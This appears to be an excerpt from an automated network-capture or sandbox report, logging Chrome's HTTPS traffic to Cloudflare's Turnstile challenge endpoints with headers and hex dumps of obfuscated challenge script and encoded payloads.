                                                                                                                                                                                                                                                                                      2024-10-24 22:06:44 UTC1369INData Raw: 5b 68 76 28 31 39 35 29 5d 28 73 29 7d 29 2c 66 3d 65 4d 5b 68 75 28 31 35 31 34 29 5d 28 66 29 2c 6b 3d 5b 5d 2c 69 3d 2d 31 3b 21 69 73 4e 61 4e 28 6d 3d 66 5b 68 75 28 31 39 35 29 5d 28 2b 2b 69 29 29 3b 6b 5b 68 75 28 31 35 36 38 29 5d 28 53 74 72 69 6e 67 5b 68 75 28 31 30 39 30 29 5d 28 68 5b 68 75 28 36 37 39 29 5d 28 68 5b 68 75 28 39 37 32 29 5d 28 68 5b 68 75 28 35 39 37 29 5d 28 6d 2c 32 35 35 29 2d 6a 2c 69 25 36 35 35 33 35 29 2c 36 35 35 33 35 29 25 32 35 35 29 29 29 3b 72 65 74 75 72 6e 20 6b 5b 68 75 28 31 33 30 37 29 5d 28 27 27 29 7d 2c 65 4d 5b 67 4c 28 31 30 34 36 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 68 48 2c 65 29 7b 65 3d 28 68 48 3d 67 4c 2c 7b 27 6d 59 58 58 46 27 3a 66 75 6e 63 74 69 6f 6e 28 67 2c 68 29 7b 72 65 74 75 72 6e
                                                                                                                                                                                                                                                                                      Data Ascii: [hv(195)](s)}),f=eM[hu(1514)](f),k=[],i=-1;!isNaN(m=f[hu(195)](++i));k[hu(1568)](String[hu(1090)](h[hu(679)](h[hu(972)](h[hu(597)](m,255)-j,i%65535),65535)%255)));return k[hu(1307)]('')},eM[gL(1046)]=function(c,hH,e){e=(hH=gL,{'mYXXF':function(g,h){return
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:44 UTC1369INData Raw: 67 28 35 36 32 29 3d 3d 3d 69 5b 69 67 28 33 37 34 29 5d 3f 28 46 3d 7b 7d 2c 46 5b 69 67 28 39 30 32 29 5d 3d 69 5b 69 67 28 32 34 33 29 5d 2c 46 5b 69 67 28 39 34 38 29 5d 3d 66 5b 69 67 28 39 36 38 29 5d 5b 69 67 28 38 36 37 29 5d 2c 46 5b 69 67 28 36 37 31 29 5d 3d 69 67 28 31 31 37 33 29 2c 65 5b 69 67 28 31 30 37 33 29 5d 5b 69 67 28 38 36 31 29 5d 28 46 2c 27 2a 27 29 29 3a 66 5b 69 67 28 32 36 39 29 5d 3d 4a 53 4f 4e 5b 69 67 28 31 34 30 34 29 5d 28 66 5b 69 67 28 32 36 39 29 5d 29 3b 69 66 28 6b 3d 69 5b 69 67 28 33 36 35 29 5d 28 68 2c 69 67 28 31 30 34 34 29 29 2c 6c 3d 65 4d 5b 69 67 28 39 36 38 29 5d 5b 69 67 28 36 36 32 29 5d 3f 69 5b 69 67 28 32 33 31 29 5d 28 27 68 2f 27 2b 65 4d 5b 69 67 28 39 36 38 29 5d 5b 69 67 28 36 36 32 29 5d 2c 27
                                                                                                                                                                                                                                                                                      Data Ascii: g(562)===i[ig(374)]?(F={},F[ig(902)]=i[ig(243)],F[ig(948)]=f[ig(968)][ig(867)],F[ig(671)]=ig(1173),e[ig(1073)][ig(861)](F,'*')):f[ig(269)]=JSON[ig(1404)](f[ig(269)]);if(k=i[ig(365)](h,ig(1044)),l=eM[ig(968)][ig(662)]?i[ig(231)]('h/'+eM[ig(968)][ig(662)],'


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      41192.168.2.1649780104.18.95.414436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:44 UTC1150OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1041210751:1729804200:EX5o_Jib2BRptk39-Ko6VfqV46eJeVfLarh36c9cMos/8d7d4685edbf2e64/7TuWtbLSQN.Xjh5Spy1Jb1hTl4eJGwQYcdxRtHPb8J4-1729807601-1.1.1.1-Y4E2900AozGcxEtMBBe9eQoPzPH1KMizuWhT3j.Jx46rLnho_zA4bsvLSqomjPaZ HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Content-Length: 3105
                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                      Content-type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      CF-Challenge: 7TuWtbLSQN.Xjh5Spy1Jb1hTl4eJGwQYcdxRtHPb8J4-1729807601-1.1.1.1-Y4E2900AozGcxEtMBBe9eQoPzPH1KMizuWhT3j.Jx46rLnho_zA4bsvLSqomjPaZ
                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Origin: https://challenges.cloudflare.com
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/pbjvg/0x4AAAAAAAxU5YQo4UeBLOJu/auto/fbE/normal/auto/
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:44 UTC3105OUTData Raw: 76 5f 38 64 37 64 34 36 38 35 65 64 62 66 32 65 36 34 3d 24 5a 41 65 48 65 4f 65 4e 65 4d 65 66 65 43 46 6b 47 46 2d 6b 54 65 32 58 36 44 79 6a 6b 64 6b 51 30 65 47 39 65 6b 6d 41 6b 34 65 54 44 53 67 6b 25 32 62 65 53 58 44 65 2d 6a 54 41 6b 6a 65 78 5a 6a 53 4c 6b 24 46 71 6b 32 67 52 73 65 78 24 39 66 4b 79 65 6b 38 61 52 41 6b 43 6b 36 39 38 52 6b 68 65 71 6b 37 6b 64 58 4b 2d 68 44 77 69 6c 53 35 53 67 65 32 52 6b 68 65 53 52 67 41 51 79 50 50 32 50 34 7a 77 44 53 69 51 78 45 56 4d 71 6b 41 34 37 72 43 4e 56 38 6b 2d 35 6b 79 44 6d 67 72 45 48 6f 65 65 6b 70 6b 6b 66 41 70 4e 53 41 34 4e 66 6a 6b 2d 53 7a 57 4b 31 4e 6a 4d 65 43 6b 78 61 6b 79 72 48 54 56 58 6b 4b 45 71 6b 47 65 2d 72 37 78 76 39 79 4f 68 43 6b 36 72 67 35 6b 58 58 6b 43 77 6a 24 45
                                                                                                                                                                                                                                                                                      Data Ascii: v_8d7d4685edbf2e64=$ZAeHeOeNeMefeCFkGF-kTe2X6DyjkdkQ0eG9ekmAk4eTDSgk%2beSXDe-jTAkjexZjSLk$Fqk2gRsex$9fKyek8aRAkCk698Rkheqk7kdXK-hDwilS5Sge2RkheSRgAQyPP2P4zwDSiQxEVMqkA47rCNV8k-5kyDmgrEHoeekpkkfApNSA4Nfjk-SzWK1NjMeCkxakyrHTVXkKEqkGe-r7xv9yOhCk6rg5kXXkCwj$E
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:44 UTC747INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Thu, 24 Oct 2024 22:06:44 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                                                                      Content-Length: 149776
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      cf-chl-gen: opoH57SkqQ2ypJqxuPPNKuJQhCNGnU8FuQKweabNkUxNpB7vRN1rnOIvv5X7vz61D3+OWgqLbWB4l5KxgY5kcvsnHrplroZivvKqx+0cK5UB1y84lu63ByoGDsGVddFluYySb05UkX/f+8+ZsZVJ6JtPBMF2H2cH6YIudGRVtsN6r/hnXgDRc30Ooe5r6/6nGXmIJfhMt+OcJX2yATZb6nJoz9E8mFdxI+PXYTu5iU1I4upWaj+MF5v+aKGkpJO0dBlMN7GAXZP+faSiZQmSeETnQLlMzEbxxEhpUTHvs5lk+TRbHwH34gpVxd6aWTVGL6xnEcP0T7DTA3iy05OgwgOt6vfTUrDEzhgOB/evHKuQKox2Pi35X0sXU0x4eRwDhGp+xK8O1ddJQ1y3jNst2wFfuXKnCIHsy+tdDzMR7Rm3RrY21e3B1YZV+08BkMdpK0N1l0Pn/zUniedx8jvP6H9utIwoIpFP9ifYICVckQFnuo8=$BhmVM056sMerNqda
                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                      CF-RAY: 8d7d46968b0628b3-DFW
                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:44 UTC622INData Raw: 64 6c 56 69 6a 59 2b 52 64 34 79 42 67 4b 4e 35 59 57 57 62 6e 6e 64 78 65 6e 5a 33 68 59 61 5a 67 32 78 78 6f 61 61 45 6f 6f 57 5a 63 58 71 34 74 4a 47 30 66 37 47 63 77 5a 2b 62 74 59 58 44 6b 35 2b 67 69 35 65 67 69 38 79 4a 6b 4d 4f 76 74 64 43 4d 73 4a 4f 76 6b 62 79 6f 73 35 71 36 74 5a 65 35 73 36 53 39 31 4c 6d 31 77 65 6a 49 74 38 53 74 76 37 37 78 78 61 37 7a 34 75 2f 74 78 63 47 77 38 63 6e 47 74 65 43 39 79 76 44 51 7a 4e 38 43 41 4f 58 58 35 4f 54 33 32 2b 38 49 41 67 33 77 78 66 44 7a 43 67 44 75 35 50 49 64 37 75 6a 32 31 2f 63 64 41 79 49 43 38 76 76 31 33 69 41 59 39 43 62 36 2f 67 66 39 2b 2f 34 70 49 41 4d 32 38 52 45 36 39 53 30 4f 4c 6a 45 32 45 66 6b 39 4d 52 55 52 50 53 46 4b 43 41 59 43 46 53 59 4b 43 69 45 63 4c 68 31 57 51 52 38
                                                                                                                                                                                                                                                                                      Data Ascii: dlVijY+Rd4yBgKN5YWWbnndxenZ3hYaZg2xxoaaEooWZcXq4tJG0f7GcwZ+btYXDk5+gi5egi8yJkMOvtdCMsJOvkbyos5q6tZe5s6S91Lm1wejIt8Stv77xxa7z4u/txcGw8cnGteC9yvDQzN8CAOXX5OT32+8IAg3wxfDzCgDu5PId7uj21/cdAyIC8vv13iAY9Cb6/gf9+/4pIAM28RE69S0OLjE2Efk9MRURPSFKCAYCFSYKCiEcLh1WQR8
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:44 UTC1369INData Raw: 31 65 59 46 74 73 61 69 52 78 50 54 56 4e 63 57 6c 77 4d 6d 52 73 66 48 70 33 62 57 46 39 56 6a 30 33 50 33 39 41 50 33 56 73 52 6f 46 76 57 59 6c 4c 52 47 4b 52 62 33 2b 43 59 32 56 78 54 58 46 33 6a 58 4a 30 69 59 43 58 66 58 4a 7a 65 58 2b 41 6f 58 4f 66 68 5a 2b 76 66 4b 46 72 69 58 36 72 64 71 47 53 63 70 43 48 68 35 65 7a 75 35 2b 79 6b 62 4b 76 72 6f 4b 37 71 63 65 5a 6e 4c 36 75 75 36 72 42 71 37 37 4d 71 36 58 55 77 35 57 69 6f 36 6a 53 71 5a 62 53 6e 39 43 32 7a 4f 53 6a 30 2b 6a 66 31 36 50 43 36 63 4c 6e 32 4e 7a 68 36 38 6a 63 7a 4f 2f 32 36 2f 61 32 73 2b 6e 50 31 62 66 53 41 39 63 45 41 65 50 55 33 38 62 6f 35 2b 62 4d 35 38 55 4b 43 4f 51 55 36 4f 6a 48 46 4f 6e 35 38 4e 45 57 42 39 6f 63 43 50 4c 73 36 76 77 67 38 79 54 6e 34 78 38 6b 4c
                                                                                                                                                                                                                                                                                      Data Ascii: 1eYFtsaiRxPTVNcWlwMmRsfHp3bWF9Vj03P39AP3VsRoFvWYlLRGKRb3+CY2VxTXF3jXJ0iYCXfXJzeX+AoXOfhZ+vfKFriX6rdqGScpCHh5ezu5+ykbKvroK7qceZnL6uu6rBq77Mq6XUw5Wio6jSqZbSn9C2zOSj0+jf16PC6cLn2Nzh68jczO/26/a2s+nP1bfSA9cEAePU38bo5+bM58UKCOQU6OjHFOn58NEWB9ocCPLs6vwg8yTn4x8kL
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:44 UTC1369INData Raw: 43 53 6c 46 66 62 6a 56 32 62 32 56 56 58 6c 6c 6f 63 30 74 68 57 6b 52 75 54 33 31 69 64 57 73 39 68 59 70 6d 69 57 39 35 68 70 4b 47 59 49 2b 48 67 6c 4a 55 56 59 6d 4d 6d 70 4f 4e 6e 32 32 45 6a 4a 78 34 6c 48 42 2b 70 59 57 64 71 36 52 71 67 59 75 68 71 33 2b 56 67 70 47 76 73 59 71 45 72 61 75 31 65 35 47 78 6c 4d 4b 4e 6c 62 58 41 76 6f 61 31 74 62 71 6c 69 4a 32 69 30 5a 47 62 6a 64 47 32 77 4a 62 46 78 4e 58 51 6c 72 72 58 73 36 79 66 75 4d 44 59 35 74 66 64 33 4c 4b 7a 36 73 44 64 71 64 2f 41 78 2f 4c 4d 35 4f 6e 33 34 72 54 51 31 64 58 4f 7a 66 37 35 32 63 33 6a 77 74 73 46 32 76 37 6a 35 65 59 42 33 66 37 4a 30 41 72 4b 36 65 50 30 31 4f 34 61 31 64 58 58 35 66 4c 63 41 4e 30 44 32 66 72 33 39 69 48 35 42 2b 41 6a 36 42 6b 68 4c 2b 7a 36 4b 43
                                                                                                                                                                                                                                                                                      Data Ascii: CSlFfbjV2b2VVXlloc0thWkRuT31idWs9hYpmiW95hpKGYI+HglJUVYmMmpONn22EjJx4lHB+pYWdq6RqgYuhq3+VgpGvsYqErau1e5GxlMKNlbXAvoa1tbqliJ2i0ZGbjdG2wJbFxNXQlrrXs6yfuMDY5tfd3LKz6sDdqd/Ax/LM5On34rTQ1dXOzf752c3jwtsF2v7j5eYB3f7J0ArK6eP01O4a1dXX5fLcAN0D2fr39iH5B+Aj6BkhL+z6KC
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:44 UTC1369INData Raw: 4d 44 5a 57 58 47 35 74 66 6c 74 42 50 56 56 2b 59 34 46 45 5a 57 53 4b 53 56 70 35 5a 59 74 70 59 32 70 4c 61 5a 46 69 68 6d 46 52 56 57 39 6e 61 35 42 70 6c 33 4a 38 6e 49 32 43 66 5a 61 6e 6c 57 70 38 68 32 64 74 67 4a 43 70 63 36 4f 32 67 32 6d 6f 6c 71 52 35 69 4c 35 37 75 59 2b 41 72 71 75 61 77 62 75 69 76 4a 71 33 68 4d 79 62 77 59 72 41 67 38 4b 50 6e 4d 4b 6c 69 61 32 50 72 72 4b 32 6e 4b 6d 33 7a 35 71 32 6e 38 2f 66 30 39 2f 52 74 4f 6a 61 36 63 72 68 71 75 2b 77 75 74 36 7a 36 75 2b 77 73 4d 62 78 2b 37 62 34 73 50 7a 78 37 4d 44 61 76 73 48 51 33 39 6e 6f 78 73 4c 6c 78 50 6b 49 30 4e 7a 39 33 39 49 4e 31 74 51 53 44 42 73 53 7a 68 66 74 44 77 30 51 33 64 72 31 44 39 7a 66 49 2f 63 5a 35 2b 67 6a 37 41 62 77 2b 7a 49 4a 4c 52 38 46 4c 2b 2f
                                                                                                                                                                                                                                                                                      Data Ascii: MDZWXG5tfltBPVV+Y4FEZWSKSVp5ZYtpY2pLaZFihmFRVW9na5Bpl3J8nI2CfZanlWp8h2dtgJCpc6O2g2molqR5iL57uY+ArquawbuivJq3hMybwYrAg8KPnMKlia2PrrK2nKm3z5q2n8/f09/RtOja6crhqu+wut6z6u+wsMbx+7b4sPzx7MDavsHQ39noxsLlxPkI0Nz939IN1tQSDBsSzhftDw0Q3dr1D9zfI/cZ5+gj7Abw+zIJLR8FL+/
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:44 UTC1369INData Raw: 46 52 57 54 58 36 44 52 6f 4e 66 4f 30 6c 33 5a 30 64 45 66 45 75 50 61 46 35 2b 6b 31 4e 30 6a 70 64 75 5a 6d 53 62 57 5a 78 33 6b 31 31 56 64 31 64 36 66 59 4e 6b 61 6c 31 34 66 6f 4f 63 6d 6d 6c 38 74 4b 5a 78 69 4a 53 78 73 70 47 47 68 48 69 4f 69 72 36 2f 66 59 36 75 76 4a 43 6a 6d 33 75 43 6c 6f 6e 42 69 59 69 6a 6a 71 48 55 6e 5a 2b 2b 6a 39 48 54 70 74 69 59 79 62 6a 53 75 4b 48 64 74 71 32 32 6e 63 43 7a 75 4d 58 70 34 73 37 4d 71 63 47 38 73 63 2f 4f 73 37 2f 6c 37 38 6e 77 36 73 6a 74 38 77 44 32 2f 62 6d 36 41 64 76 38 34 76 33 33 79 4d 4c 44 78 41 2f 73 38 4f 34 49 30 42 48 51 44 41 63 48 42 50 73 4a 31 64 77 50 48 2f 58 33 41 67 33 38 2b 79 50 35 32 67 55 6e 4b 4f 7a 6f 2f 43 6b 46 42 41 63 30 4a 7a 63 4c 4f 51 30 37 44 7a 30 52 50 42 6b 31
                                                                                                                                                                                                                                                                                      Data Ascii: FRWTX6DRoNfO0l3Z0dEfEuPaF5+k1N0jpduZmSbWZx3k11Vd1d6fYNkal14foOcmml8tKZxiJSxspGGhHiOir6/fY6uvJCjm3uClonBiYijjqHUnZ++j9HTptiYybjSuKHdtq22ncCzuMXp4s7MqcG8sc/Os7/l78nw6sjt8wD2/bm6Adv84v33yMLDxA/s8O4I0BHQDAcHBPsJ1dwPH/X3Ag38+yP52gUnKOzo/CkFBAc0JzcLOQ07Dz0RPBk1
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:44 UTC1369INData Raw: 6c 6f 5a 31 56 6e 69 34 68 6d 57 6d 71 47 57 34 2b 56 61 6c 46 6a 55 31 47 52 57 57 31 73 56 57 68 7a 6d 49 32 4c 6f 36 56 79 68 6d 56 78 66 6e 69 69 69 4b 52 72 70 70 6d 65 68 35 57 72 6f 49 65 47 64 34 65 45 71 4a 46 36 65 70 46 37 71 36 76 41 6a 37 65 7a 67 35 6d 37 69 36 54 41 78 71 65 6e 7a 73 62 45 72 4b 62 4e 6a 71 79 56 7a 4b 71 77 71 72 44 66 6b 74 58 4b 6d 36 50 6c 73 74 44 6f 76 62 69 38 33 4d 32 70 7a 63 69 73 79 72 50 67 76 37 44 41 79 76 66 69 31 4f 7a 30 7a 64 58 67 2b 74 41 43 34 4f 58 64 32 67 6e 49 34 2f 58 55 39 38 72 4a 35 67 37 38 33 51 72 31 2f 75 51 61 32 42 54 53 46 42 50 57 33 75 38 4d 45 2b 73 54 39 52 45 56 41 79 44 70 35 42 6b 75 47 50 63 4f 36 50 41 4a 4a 50 41 6c 37 66 55 37 4b 66 66 31 42 76 34 50 47 76 67 4f 4a 44 51 69 47
                                                                                                                                                                                                                                                                                      Data Ascii: loZ1Vni4hmWmqGW4+ValFjU1GRWW1sVWhzmI2Lo6VyhmVxfniiiKRrppmeh5WroIeGd4eEqJF6epF7q6vAj7ezg5m7i6TAxqenzsbErKbNjqyVzKqwqrDfktXKm6PlstDovbi83M2pzcisyrPgv7DAyvfi1Oz0zdXg+tAC4OXd2gnI4/XU98rJ5g783Qr1/uQa2BTSFBPW3u8ME+sT9REVAyDp5BkuGPcO6PAJJPAl7fU7Kff1Bv4PGvgOJDQiG
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:44 UTC1369INData Raw: 41 67 6c 68 69 61 47 78 54 52 31 36 4e 61 6d 4e 61 56 56 65 4e 64 49 64 39 59 4a 69 53 6e 36 5a 31 68 4a 2b 48 71 4a 53 4a 66 48 69 69 71 61 5a 76 5a 57 79 47 6a 70 69 53 64 72 71 38 69 62 47 32 65 37 79 4f 74 70 62 43 68 4a 32 62 70 5a 47 2f 6d 62 6e 4f 6f 63 43 49 70 36 6a 4e 72 61 61 57 30 5a 65 79 78 36 32 76 75 4c 44 4c 30 63 76 4c 73 64 76 61 76 4e 65 6f 36 4c 72 61 76 4c 32 37 7a 64 33 6d 72 71 2f 45 30 50 57 79 37 74 66 55 73 2f 79 7a 75 4c 2f 66 7a 66 50 64 38 75 48 79 35 62 72 58 76 4e 59 43 41 2b 76 48 79 50 73 4a 2b 77 59 4f 33 78 6b 44 43 66 48 6c 44 52 51 58 37 4f 2f 39 37 50 44 37 39 42 6b 65 39 68 49 42 49 69 30 5a 4a 78 34 75 41 4f 34 67 44 41 45 47 38 76 41 34 47 54 30 2b 48 6a 73 70 41 41 4c 34 44 6a 73 76 46 55 63 66 47 7a 6f 70 52 53
                                                                                                                                                                                                                                                                                      Data Ascii: AglhiaGxTR16NamNaVVeNdId9YJiSn6Z1hJ+HqJSJfHiiqaZvZWyGjpiSdrq8ibG2e7yOtpbChJ2bpZG/mbnOocCIp6jNraaW0Zeyx62vuLDL0cvLsdvavNeo6LravL27zd3mrq/E0PWy7tfUs/yzuL/fzfPd8uHy5brXvNYCA+vHyPsJ+wYO3xkDCfHlDRQX7O/97PD79Bke9hIBIi0ZJx4uAO4gDAEG8vA4GT0+HjspAAL4DjsvFUcfGzopRS
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:44 UTC1369INData Raw: 64 6e 53 4a 6c 6f 64 7a 65 4a 6d 63 68 33 75 58 57 49 79 45 66 6f 2b 59 69 49 4b 43 6d 36 46 36 6d 33 32 62 6e 48 6c 2f 72 5a 2b 79 6b 72 43 49 63 6f 32 36 6b 70 71 56 69 6e 35 2f 6f 37 61 6a 66 35 79 77 76 49 57 69 6e 36 69 75 69 5a 37 51 78 4d 33 4f 69 70 36 49 31 61 53 7a 6b 4e 6d 6b 75 35 44 4f 32 71 36 7a 35 4e 36 79 70 64 37 42 32 4c 4b 6e 36 37 32 74 32 71 76 76 37 63 62 48 78 73 57 76 34 4c 6e 50 30 73 2f 63 74 2b 6e 51 31 2f 50 35 77 67 66 77 39 38 54 57 77 2b 76 57 35 4e 37 76 32 4d 50 71 33 39 54 66 37 76 54 73 30 2f 6b 4f 39 78 62 6f 47 4e 63 44 39 66 30 50 38 65 37 79 48 51 66 63 43 79 33 32 49 75 6a 72 43 69 51 41 4c 43 4d 58 49 41 49 46 4a 68 45 32 48 42 77 7a 4b 54 73 56 4f 53 59 47 41 69 4d 33 50 79 45 43 50 6b 63 4e 4c 6b 73 76 4d 41 38
                                                                                                                                                                                                                                                                                      Data Ascii: dnSJlodzeJmch3uXWIyEfo+YiIKCm6F6m32bnHl/rZ+ykrCIco26kpqVin5/o7ajf5ywvIWin6iuiZ7QxM3Oip6I1aSzkNmku5DO2q6z5N6ypd7B2LKn672t2qvv7cbHxsWv4LnP0s/ct+nQ1/P5wgfw98TWw+vW5N7v2MPq39Tf7vTs0/kO9xboGNcD9f0P8e7yHQfcCy32IujrCiQALCMXIAIFJhE2HBwzKTsVOSYGAiM3PyECPkcNLksvMA8
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:44 UTC1369INData Raw: 35 78 37 58 6e 53 4f 58 57 79 65 62 48 61 6e 58 61 46 6b 5a 47 56 37 72 47 32 50 6e 6f 5a 70 6e 6f 47 52 67 5a 42 32 74 59 6d 5a 68 48 53 54 76 6f 69 53 66 72 43 58 6a 58 36 36 70 73 61 6e 75 35 6a 4c 69 6f 71 4e 73 5a 43 6f 6a 71 2f 52 30 61 53 5a 77 71 50 57 7a 62 53 63 32 74 65 34 7a 63 79 30 74 75 69 33 78 4f 75 70 75 73 6e 64 32 62 6a 43 77 4b 32 2f 33 74 50 54 31 50 6e 37 31 4f 6a 4a 2b 4f 66 2b 76 76 76 41 31 4c 76 37 30 63 50 45 36 67 73 4c 79 77 48 6c 33 66 33 37 45 74 4c 6f 7a 2f 44 54 42 64 51 4b 45 4e 72 62 43 78 45 65 48 43 50 66 4a 42 51 6e 33 2f 55 59 47 42 55 67 42 2b 38 74 41 43 59 56 4d 67 54 74 42 7a 49 58 38 44 49 58 4e 68 49 41 4d 68 59 30 2f 42 6b 79 47 69 51 7a 52 53 46 4e 4a 52 67 73 42 77 67 67 48 67 34 79 51 6b 34 6f 54 7a 49 33
                                                                                                                                                                                                                                                                                      Data Ascii: 5x7XnSOXWyebHanXaFkZGV7rG2PnoZpnoGRgZB2tYmZhHSTvoiSfrCXjX66psanu5jLioqNsZCojq/R0aSZwqPWzbSc2te4zcy0tui3xOupusnd2bjCwK2/3tPT1Pn71OjJ+Of+vvvA1Lv70cPE6gsLywHl3f37EtLoz/DTBdQKENrbCxEeHCPfJBQn3/UYGBUgB+8tACYVMgTtBzIX8DIXNhIAMhY0/BkyGiQzRSFNJRgsBwggHg4yQk4oTzI3


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      42192.168.2.1649782104.18.95.414436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:46 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1041210751:1729804200:EX5o_Jib2BRptk39-Ko6VfqV46eJeVfLarh36c9cMos/8d7d4685edbf2e64/7TuWtbLSQN.Xjh5Spy1Jb1hTl4eJGwQYcdxRtHPb8J4-1729807601-1.1.1.1-Y4E2900AozGcxEtMBBe9eQoPzPH1KMizuWhT3j.Jx46rLnho_zA4bsvLSqomjPaZ HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:46 UTC379INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                      Date: Thu, 24 Oct 2024 22:06:46 GMT
                                                                                                                                                                                                                                                                                      Content-Type: application/json
                                                                                                                                                                                                                                                                                      Content-Length: 7
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                      cf-chl-out: gPIWXw2al7IrMMO3WDzVioz9y3wciJ40iU8=$S+wSW+dBCzYkR7M1
                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                      CF-RAY: 8d7d46a24e8de80f-DFW
                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:46 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                                                                                                                                                                                      Data Ascii: invalid


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      43192.168.2.1649783104.18.95.414436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:46 UTC785OUTGET /cdn-cgi/challenge-platform/h/b/i/8d7d4685edbf2e64/1729807604264/bGQz0E0r8tNdFNx HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/pbjvg/0x4AAAAAAAxU5YQo4UeBLOJu/auto/fbE/normal/auto/
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:46 UTC200INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Thu, 24 Oct 2024 22:06:46 GMT
                                                                                                                                                                                                                                                                                      Content-Type: image/png
                                                                                                                                                                                                                                                                                      Content-Length: 61
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                      CF-RAY: 8d7d46a73b0545f9-DFW
